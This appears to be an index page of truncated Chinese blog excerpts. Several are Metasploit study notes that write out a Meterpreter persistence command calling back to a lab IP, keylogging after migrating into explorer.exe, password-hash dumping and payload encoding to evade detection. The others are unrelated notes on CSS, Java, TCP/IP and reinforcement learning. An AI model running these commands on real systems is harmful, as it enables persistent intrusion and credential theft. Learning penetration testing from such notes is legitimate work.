Meterpreter的persisitence脚本允许主任meterpreter代理，以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式，可以设置连接攻击机的时间间隔。如果是绑定方式，可以设置在指定时间按绑定开放端口。 举例：run persistence -X -i 50 -p 442 -r 192.168.33.129 此脚本让系统开机自启动(-X),50秒（-i 50）重连一次，使用的端口是443（-p 443）,连接的目的IP为192.168.33.129. use…

1.1 你必须知道的知识 (其中包括1.1.1 DIV + CSS的叫法解释:1.1.2 DIV + CSS 名字的误区:以及1.1.3 W3C简介.由于只是背景知识,跳过该章.) 1.2 你必须掌握的基础 1.2.1 CSS如何控制 使用 xHTML+CSS 布尿页面,其中有个很重要的特点就是结构与表现相分离,结极指 xHTML 页面代码,表现就是 CSS 代码了,如果把一个网页看成穿着衣服癿人癿话,人就是 xHTML,是结构,而衣服呢就是 CSS,是表现,现在出现的问题是,如何让 CSS 去…

一、基本命令 截屏 screenshot 2.获取系统平台信息 sysinfo 3.进程信息 ps 4.获取键盘记录 查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后-- run post/windows/capture/keylog_recorder 过一段时间CTRL+C中止。 最后在另一个终端里，可以看到我们使用键盘记录所捕捉的内容。 5.提取密码哈希 use priv运行特权账号 run post/windows/gather/hashdump…

三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集，包括使用工具Yeti、Whois （1）Whois msf > whois secmaniac.net （2）Netcraft：find the IP address of a server hosting a particular website （3）nslookup 2.主动信息收集：与目标系统主动交互 （1）使用nmap进行端口扫描 推荐选项-sS，执行一次隐秘的TCP扫描 推荐选项-Pn，告诉nmap不要使用ping命令判断…

The msfpayload component of Metasploit allows you to generate shellcode, executables, and much more for use in exploits outside of the Framework。msfpayload -h Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade…

一、渗透攻击基础 1.常用命令 show exploits 显示Meta框架中所有可用的渗透攻击模块。 show options 显示模块所需要的各种参数 back 返回Meta的上一个状态 search 查找模块 use 使用模块 show payloads 输入此命令时，Meta只会将与当前模块兼容的攻击载荷显示出来； set payload 选择需要的payload show targets 列出受到漏洞影响目标系统的类型 注意：Auto Targeting 攻击模块通过目标系统的指纹信息…

TJI读书笔记09-访问控制权限 包,package和import 权限修饰符 接口和实现 类的访问权限控制 首先问一个问题,为什么要有访问控制权限? 安全,这当然是一个很重要的原因. 让类库的使用者只能接触他做需要接触的东西. 另外一方面,当我们去重构和修改代码的时候,如何不影响其他的代码和功能?权限访问控制是可以很好的将”变动的事物”和”不变的事物”区分开来.比如一个类库,在移除旧的实现添加新的实现的时候,很有可能会破坏客户端程序员的代码. 那么怎么办呢. 一个很好的思想就是,只暴露有必要的…

章节回顾: <TCP/IP详解卷1:协议>第1章 概述-读书笔记 <TCP/IP详解卷1:协议>第2章 链路层-读书笔记 <TCP/IP详解卷1:协议>第3章 IP:网际协议(1)-读书笔记 <TCP/IP详解卷1:协议>第3章 IP:网际协议(2)-读书笔记 <TCP/IP详解卷1:协议>第4章 ARP:地址解析协议-读书笔记 <TCP/IP详解卷1:协议>第5章 RARP:逆地址解析协议-读书笔记 <TCP/IP详解卷1:协…

强化学习读书笔记 - 10 - on-policy控制的近似方法 学习笔记: Reinforcement Learning: An Introduction, Richard S. Sutton and Andrew G. Barto c 2014, 2015, 2016 参照 Reinforcement Learning: An Introduction, Richard S. Sutton and Andrew G. Barto c 2014, 2015, 2016 强化学习读书笔记 - 0…

很早以前就听过李刚老师的疯狂java系列很不错,所以最近找一本拿来拜读,再此做下读书笔记,促进更好的消化. 使用Java数组之前必须先对数组对象进行初始化.当数组的所有元素都被分配了合适的内存空间,并指定了初始值时,数组初始化完成.程序以后将不能重新改变数组对象在内存中的位置和大小. 从用法角度来看,数组元素相当于普通变量,程序既可把数组元素的值赋给普通变量,也可把普通变量的值赋给数组元素. 1.1数组初始化 1.1.1 Java数组是静态的 Java语言是典型的静态语言,因此Java的数组是静…